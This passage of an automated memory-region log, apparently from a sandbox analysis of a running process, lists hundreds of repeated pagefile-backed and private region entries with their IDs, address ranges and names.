start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8769 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8770 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8771 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8772 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8773 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8774 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8775 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8776 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8777 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8778 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8779 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8780 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8781 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8782 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8783 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8784 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8785 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8786 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8787 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8788 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8789 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8790 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8791 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8792 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8793 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8794 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8795 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8796 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8797 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8798 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8799 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8800 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8801 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8802 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8803 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 8804 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8805 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8806 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8807 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8808 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8809 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8810 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8811 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8812 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8813 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8814 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8815 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8816 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8817 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8818 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8819 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8820 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8821 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8822 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8823 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8824 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8825 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8826 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8827 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8828 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8829 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8830 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8831 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8832 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8833 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8834 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8835 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8836 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8837 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8838 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8839 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8840 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8841 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8842 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8843 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8844 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8845 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8846 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8847 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8848 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8849 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8850 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 8851 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8852 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8853 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8854 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8855 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8856 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8857 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8858 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8859 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8860 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 8861 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8862 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8863 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8864 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8865 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8866 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8867 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8868 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8869 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8870 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8871 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8872 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8873 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8874 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8875 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8876 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8877 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8878 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8879 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8880 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8881 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8882 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8883 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8884 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8885 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8886 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8887 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8888 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8889 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8890 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8891 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8892 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8893 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8894 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8895 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8896 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8897 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8898 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8899 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8900 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8901 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8902 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8903 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8904 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8905 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8906 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8907 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8908 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8909 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8910 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8911 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8912 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8913 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8914 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8915 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8916 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8917 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8918 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 8919 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8920 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8921 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8922 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8923 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8924 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8925 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8926 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8927 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8928 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8929 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8930 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8931 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8932 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8933 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8934 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8935 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8936 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8937 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8938 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8939 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8940 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8941 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8942 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8943 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8944 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8945 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8946 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8947 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8948 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8949 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8950 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8951 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8952 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8953 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8954 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8955 start_va = 0x530000 end_va = 